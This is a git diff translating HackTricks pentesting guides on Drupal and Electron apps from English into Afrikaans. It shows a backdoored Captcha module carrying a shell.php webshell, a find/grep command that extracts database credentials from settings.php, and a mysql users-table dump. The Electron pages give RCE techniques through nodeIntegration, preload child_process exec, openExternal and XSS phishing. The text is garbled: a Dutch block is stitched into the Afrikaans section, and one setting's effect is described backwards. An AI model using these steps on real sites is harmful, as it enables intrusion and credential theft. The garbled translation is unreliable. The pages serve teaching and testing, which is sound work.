+* Die konfigurasie hierbo sal reëls toepas vir die /-vouer wanneer ons 'n lêer in die /modules-vouer aanvra. Kopieer albei hierdie lêers na die captcha-vouer en skep 'n argief.
 ```bash
 mv shell.php .htaccess captcha
 tar cvf captcha.tar.gz captcha/
 ```
-
-* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**.
-* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands.
+* Veronderstel dat ons **administratiewe toegang** tot die webwerf het, klik op **`Bestuur`** en dan **`Uitbrei`** in die sybalk. Klik daarna op die **`+ Installeer nuwe module`** knoppie, en ons sal na die installasiebladsy geneem word, soos `http://drupal-site.local/admin/modules/install`. Blaai na die agterdeurde Captcha-argief en klik **`Installeer`**.
+* Sodra die installasie suksesvol is, blaai na **`/modules/captcha/shell.php`** om opdragte uit te voer.
 
 ## Post Exploitation
 
-### Read settings.php
-
+### Lees settings.php
 ```
 find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
 ```
+### Stort gebruikers uit DB
 
-### Dump users from DB
+Om gebruikers uit een database te dumpen, kunt u de volgende stappen volgen:
 
+1. Identificeer de database die wordt gebruikt door de Drupal-website. Dit kan meestal worden gevonden in het configuratiebestand van Drupal (`settings.php`).
+
+2. Maak verbinding met de database met behulp van een databasebeheertool zoals phpMyAdmin of de opdrachtregelinterface van MySQL.
+
+3. Zoek de tabel die de gebruikersinformatie bevat. In Drupal is dit meestal de tabel met de naam `users`.
+
+4. Voer een SQL-query uit om alle gebruikersgegevens uit de tabel te selecteren. Bijvoorbeeld:
+
+   ```sql
+   SELECT * FROM users;
+   ```
+
+   Deze query selecteert alle kolommen en rijen uit de `users`-tabel.
+
+5. Exporteer de resultaten van de query naar een bestand of bekijk ze direct in de databasebeheertool.
+
+Opmerking: Het dumpen van gebruikersgegevens uit een database kan illegaal zijn zonder de juiste toestemming. Zorg ervoor dat u de wettelijke en ethische richtlijnen volgt bij het uitvoeren van deze actie.
 ```
 mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
 ```
-
-## References
+## Verwysings
 
 * [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
index e2dd7dceb..91d189952 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
@@ -2,46 +2,41 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
-## Introduction
+## Inleiding
 
-Electron combines a local backend (with **NodeJS**) and a frontend (**Chromium**), although tt lacks some the security mechanisms of modern browsers.
-
-Usually you might find the electron app code inside an `.asar` application, in order to obtain the code you need to extract it:
+Electron kombineer 'n plaaslike agterkant (met **NodeJS**) en 'n voorkant (**Chromium**), alhoewel dit sommige van die sekuriteitsmeganismes van moderne webblaaie mis.
 
+Gewoonlik sal jy die elektron-toepassingskode binne 'n `.asar`-toepassing vind, om die kode te verkry moet jy dit onttrek:
 ```bash
 npx asar extract app.asar destfolder #Extract everything
 npx asar extract-file app.asar main.js #Extract just a file
 ```
-
-In the source code of an Electron app, inside `packet.json`, you can find specified the `main.js` file where security configs ad set.
-
+In die bronkode van 'n Electron-toepassing, binne `packet.json`, kan jy die `main.js` lêer vind waar sekuriteitskonfigurasies ingestel word.
 ```json
 {
-  "name": "standard-notes",
-  "main": "./app/index.js",
+"name": "standard-notes",
+"main": "./app/index.js",
 ```
+Electron het 2 proses tipes:
 
-Electron has 2 process types:
-
-* Main Process (has complete access to NodeJS)
-* Renderer Process (should have NodeJS restricted access for security reasons)
+* Hoofproses (het volledige toegang tot NodeJS)
+* Rendererproses (moet NodeJS-toegang beperk vir veiligheidsredes)
 
 ![](<../../../.gitbook/assets/image (307) (5) (1).png>)
 
-A **renderer process** will be a browser window loading a file:
-
+'n **Rendererproses** sal 'n blaaier-venster wees wat 'n lêer laai:
 ```javascript
 const {BrowserWindow} = require('electron');
 let win = new BrowserWindow();
@@ -49,73 +44,66 @@ let win = new BrowserWindow();
 //Open Renderer Process
 win.loadURL(`file://path/to/index.html`);
 ```
+Instellings van die **renderer proses** kan in die **hoofproses** in die main.js-lêer gekonfigureer word. Sommige van die konfigurasies sal die Electron-toepassing **verhoed om RCE** of ander kwesbaarhede te kry as die **instellings korrek gekonfigureer is**.
 
-Settings of the **renderer process** can be **configured** in the **main process** inside the main.js file. Some of the configurations will **prevent the Electron application to get RCE** or other vulnerabilities if the **settings are correctly configured**.
+Die Electron-toepassing **kan toegang tot die toestel kry** via Node-API's, alhoewel dit gekonfigureer kan word om dit te voorkom:
 
-The electron application **could access the device** via Node apis although it can be configure to prevent it:
-
-* **`nodeIntegration`** - is `off` by default. If on, allows to access node features from the renderer process.
-* **`contextIsolation`** - is `on` by default. If on, main and renderer processes aren't isolated.
-* **`preload`** - empty by default.
-* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform.
-* Node Integration in Workers
-* **`nodeIntegrationInSubframes`**- is `off` by default.
-  * If **`nodeIntegration`** is **enabled**, this would allow the use of **Node.js APIs** in web pages that are **loaded in iframes** within an Electron application.
-  * If **`nodeIntegration`** is **disabled**, then preloads will load in the iframe
-
-Example of configuration:
+* **`nodeIntegration`** - is standaard `off`. As dit aan is, kan node-funksies van die renderer proses gebruik word.
+* **`contextIsolation`** - is standaard `on`. As dit aan is, is die hoof- en renderer prosesse nie geïsoleer nie.
+* **`preload`** - standaard leeg.
+* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is standaard af. Dit sal die aksies wat NodeJS kan uitvoer, beperk.
+* Node-integrasie in werkers
+* **`nodeIntegrationInSubframes`** - is standaard `off`.
+* As **`nodeIntegration`** **geaktiveer** is, sal dit die gebruik van **Node.js-API's** in webbladsye wat in iframes in 'n Electron-toepassing gelaai word, toelaat.
+* As **`nodeIntegration`** **gedeaktiveer** is, sal preloads in die iframe gelaai word.
 
+Voorbeeld van konfigurasie:
 ```javascript
 const mainWindowOptions = {
-  title: 'Discord',
-  backgroundColor: getBackgroundColor(),
-  width: DEFAULT_WIDTH,
-  height: DEFAULT_HEIGHT,
-  minWidth: MIN_WIDTH,
-  minHeight: MIN_HEIGHT,
-  transparent: false,
-  frame: false,
-  resizable: true,
-  show: isVisible,
-  webPreferences: {
-    blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
-    nodeIntegration: false,
-    contextIsolation: false,
-    sandbox: false,
-    nodeIntegrationInSubFrames: false,
-    preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
-    nativeWindowOpen: true,
-    enableRemoteModule: false,
-    spellcheck: true
-  }
+title: 'Discord',
+backgroundColor: getBackgroundColor(),
+width: DEFAULT_WIDTH,
+height: DEFAULT_HEIGHT,
+minWidth: MIN_WIDTH,
+minHeight: MIN_HEIGHT,
+transparent: false,
+frame: false,
+resizable: true,
+show: isVisible,
+webPreferences: {
+blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
+nodeIntegration: false,
+contextIsolation: false,
+sandbox: false,
+nodeIntegrationInSubFrames: false,
+preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
+nativeWindowOpen: true,
+enableRemoteModule: false,
+spellcheck: true
+}
 };
 ```
-
-Some **RCE payloads** from [here](https://7as.es/electron/nodeIntegration\_rce.txt):
-
+Sommige **RCE payloads** van [hier](https://7as.es/electron/nodeIntegration\_rce.txt):
 ```html
 Example Payloads (Windows):
- 
+
 
 Example Payloads (Linux & MacOS):
 
- 
- 
+
+
 
- 
+
 ```
+### Vang verkeer
 
-### Capture traffic
-
-Modify the start-main configuration and add the use of a proxy such as:
-
+Wysig die start-main konfigurasie en voeg die gebruik van 'n proksi by soos:
 ```javascript
 "start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
 ```
+## Electron Plaaslike Kode-inspuiting
 
-## Electron Local Code Injection
-
-If you can execute locally an Electron App it's possible that you could make it execute arbitrary javascript code. Check how in:
+As jy plaaslik 'n Electron-toepassing kan uitvoer, is dit moontlik dat jy dit kan laat uitvoer om arbitrêre JavaScript-kode uit te voer. Kyk hoe in:
 
 {% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}
 [macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
@@ -123,69 +111,63 @@ If you can execute locally an Electron App it's possible that you could make it
 
 ## RCE: XSS + nodeIntegration
 
-If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Node.js features easily just by calling the `require()`. For example, the way to execute the calc application on Windows is:
-
+As die **nodeIntegration** op **aan** ingestel is, kan 'n webblad se JavaScript Node.js-funksies maklik gebruik deur eenvoudig die `require()` te roep. Byvoorbeeld, die manier om die rekenaarprogram op Windows uit te voer is:
 ```html
 
 ```
-
 

 
 ## RCE: preload
 
-The script indicated in this setting is l**oaded before other scripts in the renderer**, so it has **unlimited access to Node APIs**:
-
+Die skrip wat in hierdie instelling aangedui word, word **gelaai voordat ander skripte in die renderer**, so dit het **onbeperkte toegang tot Node APIs**:
 ```javascript
 new BrowserWindow{
-  webPreferences: {
-    nodeIntegration: false,
-    preload: _path2.default.join(__dirname, 'perload.js'),
-  }
+webPreferences: {
+nodeIntegration: false,
+preload: _path2.default.join(__dirname, 'perload.js'),
+}
 });
 ```
-
-Therefore, the script can export node-features to pages:
+Daarom kan die skrip node-kenmerke na bladsye uitvoer:
 
 {% code title="preload.js" %}
 ```javascript
 typeof require === 'function';
 window.runCalc = function(){
-    require('child_process').exec('calc')
+require('child_process').exec('calc')
 };
 ```
-{% endcode %}
-
 {% code title="index.html" %}
 ```html
 
-    
+
 
 ```
 {% endcode %}
 
 {% hint style="info" %}
-**If `contextIsolation` is on, this won't work**
+**As `contextIsolation` aan is, sal dit nie werk nie**
 {% endhint %}
 
 ## RCE: XSS + contextIsolation
 
-The _**contextIsolation**_ introduces the **separated contexts between the web page scripts and the JavaScript Electron's internal code** so that the JavaScript execution of each code does not affect each. This is a necessary feature to eliminate the possibility of RCE.
+Die _**contextIsolation**_ stel die **geskeide kontekste tussen die webbladsy-skripte en die JavaScript Electron se interne kode** in sodat die JavaScript-uitvoering van elke kode nie mekaar beïnvloed nie. Dit is 'n noodsaaklike kenmerk om die moontlikheid van RCE uit te skakel.
 
-If the contexts aren't isolated an attacker can:
+As die kontekste nie geïsoleer is nie, kan 'n aanvaller die volgende doen:
 
-1. Execute **arbitrary JavaScript in renderer** (XSS or navigation to external sites)
-2. **Overwrite the built-in method** which is used in preload or Electron internal code to own function
-3. **Trigger** the use of **overwritten function**
+1. Voer **arbitrêre JavaScript in renderer** uit (XSS of navigasie na eksterne webwerwe)
+2. **Oorskryf die ingeboude metode** wat gebruik word in preload of Electron se interne kode met eie funksie
+3. **Trigger** die gebruik van die **oorgeskryfde funksie**
 4. RCE?
 
-There are 2 places where built-int methods can be overwritten: In preload code or in Electron internal code:
+Daar is 2 plekke waar ingeboude metodes oorgeskrewe kan word: In preload-kode of in Electron se interne kode:
 
 {% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}
 [electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)
@@ -199,40 +181,35 @@ There are 2 places where built-int methods can be overwritten: In preload code o
 [electron-contextisolation-rce-via-ipc.md](electron-contextisolation-rce-via-ipc.md)
 {% endcontent-ref %}
 
-### Bypass click event
-
-If there are restrictions applied when you click a link you might be able to bypass them **doing a middle click** instead of a regular left click
+### Bypass kliekgebeurtenis
 
+As daar beperkings geld wanneer jy op 'n skakel klik, kan jy dit moontlik omseil deur **'n middelste kliek** te doen in plaas van 'n gewone linker kliek.
 ```javascript
-window.addEventListener('click', (e) => { 
+window.addEventListener('click', (e) => {
 ```
-
 ## RCE via shell.openExternal
 
-For more info about this examples check [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) and [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
+Vir meer inligting oor hierdie voorbeelde, besoek [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) en [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
 
 
-hen deploying an Electron desktop application, ensuring the correct settings for `nodeIntegration` and `contextIsolation` is crucial. It's established that **client-side remote code execution (RCE)** targeting preload scripts or Electron's native code from the main process is effectively prevented with these settings in place.
-
-Upon a user interacting with links or opening new windows, specific event listeners are triggered, which are crucial for the application's security and functionality:
+By die implementering van 'n Electron-desktoptoepassing, is dit noodsaaklik om die korrekte instellings vir `nodeIntegration` en `contextIsolation` te verseker. Dit is vasgestel dat **kliëntkant-afstandskode-uitvoering (RCE)** wat mik op voorlaai-skripte of Electron se inheemse kode vanaf die hoofproses, effektief voorkom word met hierdie instellings.
 
+Wanneer 'n gebruiker skakels gebruik of nuwe vensters oopmaak, word spesifieke gebeurtenisluisteraars geaktiveer, wat krities is vir die toepassing se veiligheid en funksionaliteit:
 ```javascript
 webContents.on("new-window", function (event, url, disposition, options) {}
 webContents.on("will-navigate", function (event, url) {}
 ```
+Hierdie luisteraars word **oorheers deur die lessenaartoepassing** om sy eie **sakelogika** te implementeer. Die toepassing evalueer of 'n genavigeerde skakel intern of in 'n eksterne webblaaier geopen moet word. Hierdie besluit word tipies deur 'n funksie, `openInternally`, geneem. As hierdie funksie `false` teruggee, dui dit daarop dat die skakel ekstern geopen moet word deur die `shell.openExternal`-funksie te gebruik.
 
-These listeners are **overridden by the desktop application** to implement its own **business logic**. The application evaluates whether a navigated link should be opened internally or in an external web browser. This decision is typically made through a function, `openInternally`. If this function returns `false`, it indicates that the link should be opened externally, utilizing the `shell.openExternal` function.
-
-**Here is a simplified pseudocode:**
+**Hier is 'n vereenvoudigde pseudokode:**
 
 ![https://miro.medium.com/max/1400/1*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
 
 ![https://miro.medium.com/max/1400/1*ZfgVwT3X1V_UfjcKaAccag.png](<../../../.gitbook/assets/image (620).png>)
 
-Electron JS security best practices advise against accepting untrusted content with the `openExternal` function, as it could lead to RCE through various protocols. Operating systems support different protocols that might trigger RCE. For detailed examples and further explanation on this topic, one can refer to [this resource](https://positive.security/blog/url-open-rce#windows-10-19042), which includes Windows protocol examples capable of exploiting this vulnerability.
-
-**Examples of Windows protocol exploits include:**
+Elektron JS-sekuriteitsbestuurspraktyke raai teen die aanvaarding van onbetroubare inhoud met die `openExternal`-funksie, aangesien dit tot RCE deur verskeie protokolle kan lei. Bedryfstelsels ondersteun verskillende protokolle wat RCE kan veroorsaak. Vir gedetailleerde voorbeelde en verdere verduideliking oor hierdie onderwerp, kan verwys word na [hierdie bron](https://positive.security/blog/url-open-rce#windows-10-19042), wat Windows-protokole voorbeelde bevat wat hierdie kwesbaarheid kan uitbuit.
 
+**Voorbeelde van Windows-protokoolaanvalle sluit in:**
 ```html
 
 ```
+## Lees Interne Lêers: XSS + contextIsolation
 
-## Reading Internal Files: XSS + contextIsolation
-
-**Disabling `contextIsolation` enables the use of `` tags**, similar to `
 
 ```
+## **RCE: XSS + Oue Chromium**
 
-## **RCE: XSS + Old Chromium**
+As die **chromium** wat deur die toepassing gebruik word, **oud** is en daar **bekende kwesbaarhede** daarop is, is dit moontlik om dit te **uitbuit en RCE te verkry deur middel van 'n XSS**.\
+Jy kan 'n voorbeeld sien in hierdie **verslag**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
 
-If the **chromium** used by the application is **old** and there are **known** **vulnerabilities** on it, it might be possible to to **exploit it and obtain RCE through a XSS**.\
-You can see an example in this **writeup**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
+## **XSS Phishing via Interne URL regex omseil**
 
-## **XSS Phishing via Internal URL regex bypass**
-
-Supposing you found a XSS but you **cannot trigger RCE or steal internal files** you could try to use it to **steal credentials via phishing**.
-
-First of all you need to know what happen when you try to open a new URL, checking the JS code in the front-end:
+As jy 'n XSS gevind het, maar jy **kan nie RCE veroorsaak of interne lêers steel nie**, kan jy probeer dit gebruik om geloofsbriewe te steel deur middel van 'n phising-aanval.
 
+Eerstens moet jy weet wat gebeur wanneer jy probeer om 'n nuwe URL oop te maak, deur die JS-kode in die voorkant te ondersoek:
 ```javascript
 webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
 webContents.on("will-navigate", function (event, url) {}                    // opens the custom openInternally function (it is declared below)
 ```
+Die oproep na **`openInternally`** sal besluit of die **skakel** in die **desktop-venster** geopen sal word, aangesien dit 'n skakel is wat aan die platform behoort, **of** of dit in die **blaaier as 'n derde party bron** geopen sal word.
 
-The call to **`openInternally`** will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**.
-
-In the case the **regex** used by the function is **vulnerable to bypasses** (for example by **not escaping the dots of subdomains**) an attacker could abuse the XSS to **open a new window which** will be located in the attackers infrastructure **asking for credentials** to the user:
-
+In die geval dat die **regex** wat deur die funksie gebruik word, **kwesbaar is vir omseilings** (byvoorbeeld deur **nie die punte van subdomeine te ontsnap nie**), kan 'n aanvaller die XSS misbruik om 'n **nuwe venster te open wat** in die infrastruktuur van die aanvaller geleë is en **gebruikersnaam en wagwoord vra** aan die gebruiker:
 ```html
 
 ```
+## **Gereedskap**
 
-## **Tools**
+* [**Electronegativity**](https://github.com/doyensec/electronegativity) is 'n instrument om verkeerde konfigurasies en sekuriteitsantipatrone in Electron-gebaseerde programme te identifiseer.
+* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) is 'n oopbron VS Code-inprop vir Electron-programme wat Electronegativity gebruik.
+* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) om te kyk vir kwesbare derde party biblioteke.
+* [**Electro.ng**](https://electro.ng/): Jy moet dit koop.
 
-* [**Electronegativity**](https://github.com/doyensec/electronegativity) is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
-* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) is an open source VS Code plugin for Electron applications that uses Electronegativity.
-* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) to check for vulnerable third party libraries
-* [**Electro.ng**](https://electro.ng/): You need to buy it
+## Laboratoriums
 
-## Labs
-
-In [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) you can find a lab to exploit vulnerable Electron apps.
-
-Some commands that will help you will the lab:
+In [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) kan jy 'n laboratorium vind om kwesbare Electron-programme te misbruik.
 
+Sommige opdragte wat jou sal help met die laboratorium:
 ```bash
 # Download apps from these URls
 # Vuln to nodeIntegration
@@ -325,27 +294,26 @@ cd vulnerable1
 npm install
 npm start
 ```
-
-## **References**
+## **Verwysings**
 
 * [https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028](https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028)
 * [https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)
 * [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8)
 * [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
 * [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)
-* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
+* Meer navorsing en skrywes oor Electron-sekuriteit in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
 * [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
index 6bea0859c..357f562de 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
@@ -1,83 +1,77 @@
-# Electron contextIsolation RCE via Electron internal code
+# Elektron contextIsolation RCE via Elektron interne kode
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
-## Example 1
+## Voorbeeld 1
 
-Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)
-
-"exit" event listener is always set by the internal code when de page loading is started. This event is emitted just before navigation:
+Voorbeeld vanaf [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)
 
+"exit" gebeurtenisluisteraar word altyd ingestel deur die interne kode wanneer die bladsy laai begin word. Hierdie gebeurtenis word uitgestraal net voor navigasie:
 ```javascript
